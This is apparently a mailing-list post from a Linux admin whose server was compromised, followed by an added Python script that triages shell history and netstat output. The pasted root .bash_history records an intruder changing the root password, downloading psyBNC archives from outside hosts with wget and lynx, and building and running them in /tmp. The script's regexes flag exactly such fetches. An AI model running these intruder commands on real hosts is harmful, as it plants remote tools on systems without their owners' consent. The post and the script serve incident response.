Re: Server hacked and root password changed .... What should I do???
Hello, many thanks to everyone who understood my desperation.
It is very hard to convince the "owners" of the network to hand a subdomain
over to you! And they are right! The openings for intrusion are multiplied in
those cases! Hence my desperation to solve this here: on the list!
Well, checking /var/log, I saw that there are zillions of files there. I presume
that the guy in question did not delete anything!
I also saw that the guy issued the following commands, according to root's .bash_history:
id
[uname -a
uname -a
passwd root
uptime
/sbin/ifconfig
uname -a
cd /tmp
wget http://xpl.netmisphere2.com/psyBNC2.3.2-4.tar.tar
lynx -source http://xpl.netmisphere2.com/psyBNC2.3.2-4.tar.tar > psyBNC2.3.2-4.tar.tar
tar -zxvf psyBNC2.3.2-4.tar.tar
cd psybnc
ls
make
makefile
./psybnc
chmod 777 psybnc
cd psybnc[
cd psybnc
cd /tmp
ls
cd psybnc
make;pico psybnc.conf;./psybnc
./psybnc
ls
cd /tmp
ls
rm -vr psyBNC2.3.2-4.tar.tar
rm -vr psybnc
ls
wget http://geocities.com/bogdanul_16/LinuZ/psybnc.tgz
lynx -source http://geocities.com/bogdanul_16/LinuZ/psybnc.tgz > psybnc.tgz
tar -zxvf psybnc.tgz
cd psybnc
ls
make
pico psybnc.conf
vi psybnc.conf
./psybnc
/sbin/ifconfig
cd /tmp;wget http://www.psychoid.lam3rz.de/psyBNC2.3.2-4.tar.gz;
lynx -source http://www.psychoid.lam3rz.de/psyBNC2.3.2-4.tar.gz > psyBNC2.3.2-4.tar.gz
ls
rm -vr psyBNC2.3.2-4.tar.gz
rm -vr psybnc
ls
rm -vr psybnc.tgz
killall -9 psybnc
ls
ps -aux
killall -9 psybnc
cd /va/tmp
cd /tmp
cd /var/tmp
lynx -source http://www.psychoid.lam3rz.de/psyBNC2.3.2-4.tar.gz > psyBNC2.3.2-4.tar.gz
/sbin/ifconfig
id
cd /tmp
lynx -source http://xpl.netmisphere2.com/psybnc.tar.tar > psybnc.tar.tar
tar -zxvf psybnc.tar.tar
cd ...
./run "dev" ./uptime
uname -a
/sbin/ifconfig
ps -aux
killall -9 bindz
killall -9 r0nin
Besides that, the command netstat -pantu shows:
Conexões Internet Ativas (servidores e estabelecidas)
Proto Recv-Q Send-Q Endereço Local Endereço Remoto Estado PID/Program name
tcp 0 0 0.0.0.0:37 0.0.0.0:* OUÇA 355/inetd
tcp 0 0 0.0.0.0:9 0.0.0.0:* OUÇA 355/inetd
tcp 0 0 127.0.0.1:3306 0.0.0.0:* OUÇA 416/mysqld
tcp 0 0 0.0.0.0:13 0.0.0.0:* OUÇA 355/inetd
tcp 0 0 0.0.0.0:80 0.0.0.0:* OUÇA 590/apache
tcp 0 0 0.0.0.0:22 0.0.0.0:* OUÇA 576/sshd
tcp 0 0 0.0.0.0:25 0.0.0.0:* OUÇA 551/master
udp 0 0 0.0.0.0:9 0.0.0.0:* 355/inetd
Another thing would be the command ps aux, which shows:
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1 0.1 1.3 1492 484 ? S 17:43 0:05 init [2]
root 2 0.0 0.0 0 0 ? S 17:43 0:00 [keventd]
root 3 0.0 0.0 0 0 ? SN 17:43 0:00 [ksoftirqd_CPU0]
root 4 0.0 0.0 0 0 ? S 17:43 0:00 [kswapd]
root 5 0.0 0.0 0 0 ? S 17:43 0:00 [bdflush]
root 6 0.0 0.0 0 0 ? S 17:43 0:00 [kupdated]
root 7 0.0 0.0 0 0 ? S 17:43 0:00 [i2oevtd]
root 9 0.0 0.0 0 0 ? S 17:43 0:00 [kreiserfsd]
root 342 0.0 1.6 1544 588 ? Ss 17:45 0:01 /sbin/syslogd
root 345 0.0 1.3 2216 504 ? Ss 17:45 0:01 /sbin/klogd
root 355 0.0 1.2 1520 456 ? Ss 17:45 0:00 /usr/sbin/inetd
root 370 0.0 2.8 2496 1044 ? S 17:45 0:00 /bin/sh /usr/bin/mysqld_safe
root 415 0.0 2.8 2496 1048 ? S 17:45 0:00 /bin/sh /usr/bin/mysqld_safe
mysql 416 0.0 15.8 73584 5736 ? S 17:45 0:01 /usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --user=mysql --pid-file=/var/run/mysqld/mysqld.pid --skip-locking --port=3306 --socket=/var/run/mysqld/mysqld.sock
root 417 0.0 1.3 1476 488 ? S 17:45 0:00 logger -p daemon.err -t mysqld_safe -i -t mysqld
mysql 420 0.0 15.8 73584 5736 ? S 17:45 0:00 /usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --user=mysql --pid-file=/var/run/mysqld/mysqld.pid --skip-locking --port=3306 --socket=/var/run/mysqld/mysqld.sock
mysql 421 0.0 15.8 73584 5736 ? S 17:45 0:00 /usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --user=mysql --pid-file=/var/run/mysqld/mysqld.pid --skip-locking --port=3306 --socket=/var/run/mysqld/mysqld.sock
mysql 422 0.0 15.8 73584 5736 ? S 17:45 0:00 /usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --user=mysql --pid-file=/var/run/mysqld/mysqld.pid --skip-locking --port=3306 --socket=/var/run/mysqld/mysqld.sock
mysql 423 0.0 15.8 73584 5736 ? S 17:45 0:00 /usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --user=mysql --pid-file=/var/run/mysqld/mysqld.pid --skip-locking --port=3306 --socket=/var/run/mysqld/mysqld.sock
mysql 424 0.0 15.8 73584 5736 ? S 17:45 0:00 /usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --user=mysql --pid-file=/var/run/mysqld/mysqld.pid --skip-locking --port=3306 --socket=/var/run/mysqld/mysqld.sock
mysql 425 0.0 15.8 73584 5736 ? S 17:45 0:00 /usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --user=mysql --pid-file=/var/run/mysqld/mysqld.pid --skip-locking --port=3306 --socket=/var/run/mysqld/mysqld.sock
mysql 426 0.0 15.8 73584 5736 ? S 17:45 0:00 /usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --user=mysql --pid-file=/var/run/mysqld/mysqld.pid --skip-locking --port=3306 --socket=/var/run/mysqld/mysqld.sock
mysql 427 0.0 15.8 73584 5736 ? S 17:45 0:00 /usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --user=mysql --pid-file=/var/run/mysqld/mysqld.pid --skip-locking --port=3306 --socket=/var/run/mysqld/mysqld.sock
mysql 428 0.0 15.8 73584 5736 ? S 17:45 0:00 /usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --user=mysql --pid-file=/var/run/mysqld/mysqld.pid --skip-locking --port=3306 --socket=/var/run/mysqld/mysqld.sock
root 551 0.0 3.1 2956 1140 ? Ss 17:45 0:00 /usr/lib/postfix/master
postfix 556 0.0 3.0 2964 1096 ? S 17:45 0:00 pickup -l -t fifo -u -c
postfix 557 0.0 3.3 2996 1208 ? S 17:45 0:00 qmgr -l -t fifo -u -c
root 566 0.0 4.3 6736 1588 ? Ss 17:45 0:00 /usr/sbin/saslauthd -a pam
root 567 0.0 4.3 6736 1588 ? S 17:45 0:00 /usr/sbin/saslauthd -a pam
root 568 0.0 4.3 6736 1588 ? S 17:45 0:00 /usr/sbin/saslauthd -a pam
root 569 0.0 4.3 6736 1588 ? S 17:45 0:00 /usr/sbin/saslauthd -a pam
root 570 0.0 4.3 6736 1588 ? S 17:45 0:00 /usr/sbin/saslauthd -a pam
root 576 0.0 3.8 3648 1380 ? Ss 17:45 0:00 /usr/sbin/sshd
daemon 580 0.0 1.6 1672 616 ? Ss 17:45 0:00 /usr/sbin/atd
root 583 0.0 2.2 1756 820 ? Ss 17:45 0:00 /usr/sbin/cron
root 590 0.0 13.2 13096 4812 ? S 17:45 0:00 /usr/sbin/apache
root 596 0.0 4.7 4112 1708 tty1 Ss 17:45 0:01 -bash
root 597 0.0 1.3 1484 476 tty2 Ss+ 17:45 0:00 /sbin/getty 38400 tty2
root 598 0.0 1.3 1484 476 tty3 Ss+ 17:45 0:00 /sbin/getty 38400 tty3
root 599 0.0 1.3 1484 476 tty4 Ss+ 17:45 0:00 /sbin/getty 38400 tty4
root 600 0.0 1.3 1484 476 tty5 Ss+ 17:45 0:00 /sbin/getty 38400 tty5
root 601 0.0 1.3 1484 476 tty6 Ss+ 17:45 0:00 /sbin/getty 38400 tty6
www-data 602 0.0 9.3 13096 3380 ? S 17:45 0:00 /usr/sbin/apache
www-data 603 0.0 9.3 13096 3380 ? S 17:45 0:00 /usr/sbin/apache
www-data 604 0.0 9.3 13096 3380 ? S 17:45 0:00 /usr/sbin/apache
www-data 605 0.0 9.3 13096 3380 ? S 17:45 0:00 /usr/sbin/apache
www-data 606 0.0 9.3 13096 3380 ? S 17:45 0:00 /usr/sbin/apache
root 921 0.0 2.3 2480 864 tty1 R+ 19:03 0:00 ps aux
I turned Google upside down and saw that this y2kupdate is something to do with
irq! But I would like to know how to find out how he got into my system. Because
this psyBNC is something like an irq script, but I did not see the egg running.
Could someone who has lived through or witnessed something like this show me
the way to clean my system, and protect myself, without reformatting the
system?
At first sight the logs are all there and he did not rm everything!!!!
Thanks
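Triage of the kind of artifacts posted above (root's .bash_history, netstat -pantu, ps aux), as an added example that is not part of the original post or of any tool it mentions: a Python script that flags download, execute, permission-change and cleanup steps in a shell history while tracking whether the session has moved into a world-writable staging directory, and that lists the listening sockets from netstat output, re-joining rows that a mail client wrapped so that the PID/Program column landed on its own line. The sample history and netstat rows are constructed to mirror the shape of the posted output; the host example.invalid, the tool name, and the psybnc listener on port 31337 are placeholders, and the BASELINE set is an assumption about which services this host is meant to run.

```python
"""Offline triage helpers for a compromised Linux host (added example).
Sample input below is constructed, not taken from a real incident."""
import re
from dataclasses import dataclass

# Directories an intruder typically stages tools in (world-writable on most systems).
STAGING_DIRS = ("/tmp", "/var/tmp", "/dev/shm")
FETCH_RE = re.compile(r"\b(?:wget|curl|lynx\s+-source|fetch)\b.*?((?:https?|ftp)://\S+)")
KILL_RE = re.compile(r"\bkillall\b(?:\s+-\S+)*\s+(\S+)|\bkill\s+-9\s+(\S+)")
# netstat -pantu row: proto recv-q send-q local remote [state] pid/program.
# State is optional (UDP has none) and locale-dependent, so it is matched but ignored.
NETSTAT_RE = re.compile(r"^(tcp|udp)6?\s+\d+\s+\d+\s+(\S+)\s+(\S+)\s+(?:(\S+)\s+)?(\d+)/(\S+)")


@dataclass
class Finding:
    line_no: int   # 1-based line in the history file
    command: str   # the offending command segment
    reason: str


def scan_history(history: str) -> list[Finding]:
    """Walk the history line by line and `;`-segment by segment, tracking
    whether the session is inside a staging directory when it runs ./binaries."""
    findings, in_staging = [], False
    for n, raw in enumerate(history.splitlines(), 1):
        for seg in (s.strip() for s in raw.split(";")):
            if not seg:
                continue
            if seg.startswith("cd "):
                target = seg[3:].strip()
                if target.startswith("/"):             # absolute path: re-evaluate
                    in_staging = target.rstrip("/") in STAGING_DIRS
                continue                               # relative cd keeps current state
            m = FETCH_RE.search(seg)
            if m:
                findings.append(Finding(n, seg, f"fetched remote file {m.group(1)}"))
            elif seg.startswith("passwd"):
                findings.append(Finding(n, seg, "account password changed"))
            elif seg.startswith(("chmod 777", "chmod +x")):
                findings.append(Finding(n, seg, "permission change on staged file"))
            elif seg.startswith("./"):
                where = "staging dir" if in_staging else "cwd"
                findings.append(Finding(n, seg, f"executed local binary from {where}"))
            elif (k := KILL_RE.search(seg)):
                findings.append(Finding(n, seg, f"killed process {k.group(1) or k.group(2)}"))
            elif seg.startswith("rm "):
                findings.append(Finding(n, seg, "removed files (tool cleanup)"))
    return findings


def _unwrap(text: str) -> list[str]:
    """Re-join rows whose PID/Program column was wrapped onto the next line."""
    out: list[str] = []
    for line in text.splitlines():
        if out and re.fullmatch(r"\s*\d+/\S+\s*", line):
            out[-1] += " " + line.strip()
        else:
            out.append(line)
    return out


def listening_sockets(netstat_out: str) -> list[tuple[str, str, int, str]]:
    """Return (proto, local_address, pid, program) for every parsable row."""
    rows = []
    for line in _unwrap(netstat_out):
        m = NETSTAT_RE.match(line.strip())
        if m:
            proto, local, _remote, _state, pid, prog = m.groups()
            rows.append((proto, local, int(pid), prog))
    return rows


def unexpected_listeners(rows, expected_programs: set[str]):
    """Sockets owned by programs that are not on the host's service baseline."""
    return [r for r in rows if r[3] not in expected_programs]


# --- constructed sample input, modelled on the shape of the posted artifacts ---
SAMPLE_HISTORY = """\
passwd root
cd /tmp
wget http://example.invalid/tool.tgz
tar -zxvf tool.tgz
cd tool
make;pico tool.conf;./tool
chmod 777 tool
rm -vr tool.tgz
killall -9 bindz
"""
SAMPLE_NETSTAT = """\
Proto Recv-Q Send-Q Local Address   Foreign Address  State   PID/Program name
tcp        0      0 0.0.0.0:22      0.0.0.0:*        LISTEN
576/sshd
tcp        0      0 127.0.0.1:3306  0.0.0.0:*        LISTEN  416/mysqld
tcp        0      0 0.0.0.0:31337   0.0.0.0:*        LISTEN  702/psybnc
udp        0      0 0.0.0.0:9       0.0.0.0:*                355/inetd
"""
# Services this host is supposed to run (assumption; take it from your own inventory).
BASELINE = {"sshd", "mysqld", "inetd", "apache", "master"}

if __name__ == "__main__":
    for f in scan_history(SAMPLE_HISTORY):
        print(f"history:{f.line_no}: {f.reason}: {f.command}")
    for proto, local, pid, prog in unexpected_listeners(listening_sockets(SAMPLE_NETSTAT), BASELINE):
        print(f"unexpected listener {proto} {local} pid={pid} ({prog})")
```

Two caveats when reading the results against a real host. A shell history only records what the intruder did not bother to clean up, so an empty finding list proves nothing, while the posted history (fetches into /tmp and /var/tmp, a `cd ...` into a directory literally named `...`, and `killall` of names that belong to no installed package) is already enough to treat the machine as fully compromised. Likewise, a netstat listing with no unexpected listener, as in the post, does not mean the bouncer is gone: check the staging directories and that `...` directory on the filesystem, not only the process and socket tables.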